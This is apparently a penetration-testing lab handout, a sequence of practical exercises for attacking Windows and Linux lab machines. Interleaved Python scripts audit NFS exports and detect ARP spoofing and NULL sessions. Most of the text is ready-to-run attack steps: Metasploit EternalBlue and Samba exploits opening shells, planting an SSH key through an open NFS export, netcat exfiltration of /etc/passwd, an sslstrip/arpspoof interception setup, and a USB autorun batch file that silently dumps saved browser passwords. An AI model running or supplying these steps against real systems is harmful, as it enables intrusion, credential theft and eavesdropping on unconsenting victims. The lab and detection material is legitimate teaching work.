Practicals 3

This document provides instructions for exploiting Windows and Linux systems using tools like Nmap, Metasploit, and Netcat. It describes how to use the EternalBlue exploit and Metasploit to gain remote code execution on Windows. It also explains how to exploit misconfigurations in Linux like insecure NFS shares and Samba vulnerabilities. The document demonstrates transferring files between systems using Netcat and establishing connections with Netcat. Overall, the document outlines several methods for reconnaissance, exploitation, and post-exploitation of remote systems.

Uploaded by

Tarik Ameziane

Practical DAY 3

1. Exploiting Windows
First, let's run some scans:
nmap -sV --osscan-guess -p 1-10000 [IP Address]
nmap -T4 -sV --version-all --osscan-guess -A -p 1-10000 [IP Address]
nmap -T4 -PA -sV --version-all --osscan-guess -A -p 1-10000 [IP Address]
nmap -T4 -PA -sC -sV --version-all --osscan-guess -A -p 1-65535 [IP Address]
nmap -sU -sV --version-all -p 1-10000 [IP Address]
nmap -v -p 139,445 --script vuln --script-args=unsafe=1 [IP Address]

Now cross-check this data with your Nessus results. Which exploit will work?
Let us search for one:
searchsploit remote smb microsoft windows
In the list we can see the “EternalBlue” MS17-010 SMB exploit.
EternalBlue is one of several tools that were allegedly created and used by the NSA.

Start the Metasploit framework and execute the following commands in it:
search eternalblue
use exploit/windows/smb/ms17_010_eternalblue
show options
This is an easy exploit to use, so the only things we need to set are the target IP (RHOST) and the payload:
set RHOST 192.168.1.127
set payload windows/x64/meterpreter/reverse_tcp
show options
If the Kali IP address is not set, we need to change it (check the LHOST setting):
set LHOST Your_IP
exploit
We should now have a shell on the victim:
help
shell
whoami

2. Exploiting Linux
a) Misconfigurations
Once again, let's run some scans:
nmap -sV --osscan-guess -p 1-10000 [IP Address]
nmap -T4 -sV --version-all --osscan-guess -A -p 1-10000 [IP Address]
nmap -T4 -PA -sV --version-all --osscan-guess -A -p 1-10000 [IP Address]
nmap -T4 -PA -sC -sV --version-all --osscan-guess -A -p 1-65535 [IP Address]
nmap -sU -sV --version-all -p 1-10000 [IP Address]
We can see open TCP ports 512, 513, and 514, which are known as the "r" services. There is a known configuration issue, the ".rhosts + +" situation, in which a misconfigured host allows remote access from any host. To take advantage of this we need to install the rsh-client. If you are prompted for an SSH key during this practical, it means the rsh-client tools have not been installed and Kali is defaulting to SSH. Please execute:
curl -O http://http.us.debian.org/debian/pool/main/n/netkit-rsh/rsh-client_0.17-17+b1_amd64.deb
dpkg -i rsh-client_0.17-17+b1_amd64.deb
rlogin -l root Target_IP

b) Weaknesses
Looking at the scan results, the reported vulnerabilities point to problems with the Network File System (NFS). NFS can be identified by probing port 2049 directly or by asking the portmapper for a list of services. Let us check this:
rpcinfo -p Target_IP
showmount -e Target_IP
ssh-keygen
mkdir -p /mount/linux
mount -t nfs 192.168.130.149:/ /mount/linux -o nolock
cat ~/.ssh/id_rsa.pub >> /mount/linux/root/.ssh/authorized_keys
umount /mount/linux
ssh root@192.168.130.149
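The write into /root/.ssh above only succeeds because the export hands the whole filesystem to any client without squashing root. The following audit script is an added example (not part of the practical) that parses an exports(5)-style file and flags exactly those conditions; the sample file is constructed, and the "hardened" entry shows the corrected form.

```python
from typing import Dict, List, Tuple

# Constructed sample /etc/exports, not taken from the lab machine.
SAMPLE_EXPORTS = """
# weak: the whole root filesystem, to any host, with remote root kept as root
/ *(rw,no_root_squash,sync)
# pitfall: the space before "(rw)" exports to host1 with defaults AND to everyone rw
/srv/backup host1 (rw)
# hardened: one subnet, root squashed (the default), read-only
/srv/data 192.168.130.0/24(ro,root_squash,sync)
"""


def parse_exports(text: str) -> List[Tuple[str, str, List[str]]]:
    """Return (path, client, options) triples from exports(5)-style text."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        path, *clients = line.split()
        for tok in clients:
            client, _, opts = tok.partition("(")
            options = opts.rstrip(")").split(",") if opts else []
            # exports(5): an option group with no client (space before the paren)
            # applies to every host, so record it as a "*" export
            entries.append((path, client or "*", options))
    return entries


def audit_exports(text: str) -> Dict[str, List[str]]:
    """Map 'path -> client' to the list of problems found for that export."""
    findings: Dict[str, List[str]] = {}
    for path, client, options in parse_exports(text):
        problems = []
        if client == "*":
            problems.append("exported to any host")
        if "no_root_squash" in options:
            problems.append("no_root_squash: remote root writes as local root (e.g. into /root/.ssh)")
        if path == "/":
            problems.append("root filesystem exported")
        if "rw" in options and client == "*":
            problems.append("world-writable export")
        if problems:
            findings[f"{path} -> {client}"] = problems
    return findings


if __name__ == "__main__":
    for export, problems in audit_exports(SAMPLE_EXPORTS).items():
        print(export, "->", "; ".join(problems))
```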

c) Vulnerabilities
How about pushing some exploits?
In the scan we saw port 139 (Samba) open, and it is vulnerable. Samba needs ports 137-139 and 445 for NetBIOS and Active Directory functionality. Metasploit will help again:
use exploit/multi/samba/usermap_script
show options
set RHOST 192.168.130.149
show options
If necessary, set LHOST also.
exploit

d) Exfiltrate
Using Netcat, establish a tunnel between your machine and the target and transfer the /etc/passwd file to your device.
Write down all the steps taken!

3. Using SSL Strip


In this exercise you will use the utility sslstrip on Kali Linux to intercept communications meant for an SSL-encrypted site. Once you've completed it, you should have a log file containing information captured during the session. While you can perform this exercise on any Linux box, it will require you to download software. If you use Kali Linux 2.0, all tools should be present.
From a command prompt, do the following:
1. Configure Kali to forward incoming packets that were not intended for it or addressed to it by using the following command:
echo 1 > /proc/sys/net/ipv4/ip_forward
2. Learn the network gateway by entering:
netstat -nr
3. On the list of returned results, note the gateway listed.
4. Use the arpspoof command to redirect traffic intended for other hosts on the network to your host. Use the following command:
arpspoof -i eth0 192.168.1.1
In this example, eth0 is assumed to be connected to your network. Replace this name with what is appropriate for your system. You can use ifconfig to determine the active adapter. For the IP address I used 192.168.1.1; just replace this with the gateway address you learned in the previous step.
5. Set up a firewall rule on the system to redirect traffic from port 80 to 8080. Use the following command, which uses iptables to create the rule:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
6. Now run sslstrip and listen on port 8080:
sslstrip -l 8080
7. Open a browser and go to any site that uses SSL, such as Gmail or similar. Note that your browser will show http instead of the https it would normally show for an HTTPS address. This is because sslstrip is intercepting the HTTPS requests and using HTTP instead before sending the traffic on to the intended recipient.
8. Press Ctrl+C to stop the attack.
9. In Linux, browse to the SSL Strip folder and open the sslstrip.log file; you will see the information that was gathered while sslstrip was running.
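Step 4 works only because the victims' ARP caches now map the gateway address to the attacker's MAC, and that is also what a defender can watch for. The following detector is an added example, not part of the exercise: it takes a constructed series of ARP-table observations (as a host agent polling `arp -a` might record them) and flags an IP whose MAC changes, plus one MAC that claims the gateway and another address at the same time.

```python
from collections import defaultdict
from typing import Dict, List, Set, Tuple

# Constructed ARP-table observations (time, ip, mac); not captured from the lab network.
OBSERVATIONS: List[Tuple[str, str, str]] = [
    ("10:00:00", "192.168.1.1",  "00:11:22:33:44:01"),  # gateway, legitimate MAC
    ("10:00:00", "192.168.1.50", "00:11:22:33:44:AA"),  # another host on the LAN
    ("10:00:30", "192.168.1.1",  "00:11:22:33:44:01"),
    ("10:01:00", "192.168.1.1",  "00:11:22:33:44:aa"),  # gateway now answers from that host's MAC
]


def detect_arp_spoof(obs: List[Tuple[str, str, str]], gateway_ip: str) -> List[str]:
    """Flag per-IP MAC changes and a single MAC claiming the gateway plus other IPs."""
    alerts: List[str] = []
    current: Dict[str, str] = {}  # latest MAC seen for each IP
    for when, ip, mac in obs:
        mac = mac.lower()  # normalise case before comparing
        previous = current.get(ip)
        if previous is not None and previous != mac:
            tag = " [GATEWAY]" if ip == gateway_ip else ""
            alerts.append(f"{when} {ip} changed {previous} -> {mac}{tag}")
        current[ip] = mac

    # A spoofing host's MAC ends up mapped to its own IP and to the gateway IP.
    ips_by_mac: Dict[str, Set[str]] = defaultdict(set)
    for ip, mac in current.items():
        ips_by_mac[mac].add(ip)
    for mac, ips in ips_by_mac.items():
        if gateway_ip in ips and len(ips) > 1:
            others = ", ".join(sorted(ips - {gateway_ip}))
            alerts.append(f"{mac} claims gateway {gateway_ip} and {others}")
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_spoof(OBSERVATIONS, "192.168.1.1"):
        print(alert)
```

On the client side a static ARP entry for the gateway (`arp -s`) or dynamic ARP inspection on the switch prevents the redirection, and HSTS stops the browser from accepting the plain-HTTP downgrade for sites that send it.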

4. USB Stealer Method


In order to carry out this attack you can use the following generic steps:
1. Obtain a password-hacking utility such as pspv.exe.
2. Copy the utility to a USB drive.
3. Create a Notepad file called launch.bat containing the following lines:
[autorun]
open=launch.bat
start pspv.exe /s passwords.txt
start ChromePass.exe /stext chrome.txt
start OperaPassView.exe /stext OperaView.txt
start PasswordFox.exe /stext PasswordFox.txt
taskkill /im pspv.exe
taskkill /im ChromePass.exe
taskkill /im OperaPassView.exe
taskkill /im PasswordFox.exe
4. Save launch.bat to the USB drive.
At this point, you can insert the USB drive into a target computer. The tools will extract passwords and place them in the files.

5. Using Netcat
This is a practical example of how to use Netcat to establish a connection to a remote host. For this practical you need either two different machines or simply two different terminal windows.
a) On the target system, start Netcat by running the following command:
nc -l -p 4444    # listen (-l) on a specific port (-p), here 4444
b) On another machine (the client), initiate a connection to the target by issuing the following command:
nc <target ip address> 4444
When the console connects, try entering commands to be executed on the remote system.

5a. By looking at the scan report made by Nessus against the Linux server lab machine, choose one of the vulnerabilities you believe you can exploit (NOT THE ONE USED IN THIS PRACTICAL). Run the exploit using Metasploit and create a shell. From the victim machine take the /etc/passwd file and transfer it to your attack machine using netcat! Write down all the steps you took to complete the assignment.

ANSWER:
cat /etc/passwd | nc -l -p 4444    # on the victim: serve the file on port 4444
To receive the file:
nc your.ip 4444 > passwd    # on the attack machine; your.ip is the address of the machine running the listener above

6. NULL Sessions
A NULL session is used to allow clients or endpoints of a connection to access certain types of information across the network. NULL sessions are a regular Windows feature used for legitimate purposes, but the fact that a NULL session can reveal a lot of information is often abused.
A NULL session happens when a connection is made to a Windows system without credentials being provided. This session can only be made to a special location called the interprocess communication (IPC) share, which is an administrative share. In normal practice, NULL sessions are designed to facilitate a connection between systems on a network to allow one system to enumerate the processes and shares on the other and get the following:
List of users and groups
List of machines
List of shares
Users and host SIDs
The NULL session allows access to a system using a special account called a NULL user that can be used to reveal information about system shares or user accounts without requiring a username or password.
Exploiting a NULL session takes just a few commands.
For example, if the target's hostname is “win2008” we can connect in the following way:
net use \\win2008\ipc$ "" /user:""
Note that ipc$ is the IPC share.
To view the shares available on a system, after issuing the command to connect:
net view \\win2008
The next step is to connect to a share and view the data:
net use s: \\win2008\(shared folder name)
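On the target, the connection above shows up in the Security log as a network logon (event 4624, logon type 3) by ANONYMOUS LOGON, followed by share access (event 5140) to IPC$ by the same account. The following detector is an added example, not part of the practical: it counts those indicators per source address over constructed, simplified key=value records whose field names follow the EventData names of those two events.

```python
import re
from collections import Counter
from typing import Dict, List

# Constructed, simplified Security-log records (one event per line, key=value fields).
# Field names follow the EventData of events 4624 and 5140; the lines are not real exports.
SAMPLE_EVENTS = r"""
EventID=4624 LogonType=3 TargetUserName=alice TargetDomainName=LAB IpAddress=192.168.1.20
EventID=4624 LogonType=3 TargetUserName=ANONYMOUS LOGON TargetDomainName=NT AUTHORITY IpAddress=192.168.1.50
EventID=5140 SubjectUserName=ANONYMOUS LOGON ShareName=\\*\IPC$ IpAddress=192.168.1.50
EventID=5140 SubjectUserName=alice ShareName=\\*\data IpAddress=192.168.1.20
EventID=4624 LogonType=3 TargetUserName=ANONYMOUS LOGON TargetDomainName=NT AUTHORITY IpAddress=192.168.1.50
"""

# key=value pairs whose values may contain spaces ("ANONYMOUS LOGON", "NT AUTHORITY")
FIELD_RE = re.compile(r"(\w+)=(.*?)(?=\s+\w+=|$)")


def parse_events(text: str) -> List[Dict[str, str]]:
    """Turn each non-empty line into a dict of its fields."""
    return [dict(FIELD_RE.findall(line)) for line in text.splitlines() if line.strip()]


def find_null_sessions(events: List[Dict[str, str]]) -> Dict[str, int]:
    """Count NULL-session indicators per source IP: anonymous network logons and IPC$ access."""
    hits: Counter = Counter()
    for ev in events:
        eid = ev.get("EventID")
        if (eid == "4624" and ev.get("LogonType") == "3"
                and ev.get("TargetUserName") == "ANONYMOUS LOGON"):
            hits[ev.get("IpAddress", "?")] += 1
        elif (eid == "5140" and ev.get("SubjectUserName") == "ANONYMOUS LOGON"
                and ev.get("ShareName", "").upper().endswith("IPC$")):
            hits[ev.get("IpAddress", "?")] += 1
    return dict(hits)


if __name__ == "__main__":
    # Hardening on the server side is the RestrictAnonymous / RestrictAnonymousSAM
    # values under HKLM\SYSTEM\CurrentControlSet\Control\Lsa; this script only detects.
    for ip, n in find_null_sessions(parse_events(SAMPLE_EVENTS)).items():
        print(f"{ip}: {n} NULL-session indicators")
```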

7. Enumerating Windows machines using UDP packets in the SNMP protocol. Below you will find Windows-specific values for enumerating SNMP. Use this information to collect the data from your target.

1.3.6.1.2.1.25.4.2.1.4 Processes Path
1.3.6.1.2.1.25.2.3.1.4 Storage Units
1.3.6.1.2.1.25.6.3.1.2 Software Name
1.3.6.1.4.1.77.1.2.25 User Accounts
1.3.6.1.2.1.6.13.1.3 TCP Local Ports
Example of using the snmpwalk command to enumerate the entire MIB tree (check your phase2.pdf for more details):
snmpwalk -c public -v1 -t 10 10.11.1.14
This command enumerates the entire MIB tree, using the -c option to specify the community string and -v to specify the SNMP version number; -t 10 increases the timeout to 10 seconds (as this is UDP, the timeout needs to be bigger in case we have slow responses).
Using the above data, execute the command and:

a) Enumerate Windows users
b) Enumerate running Windows processes
c) Enumerate open TCP ports
d) Enumerate installed software
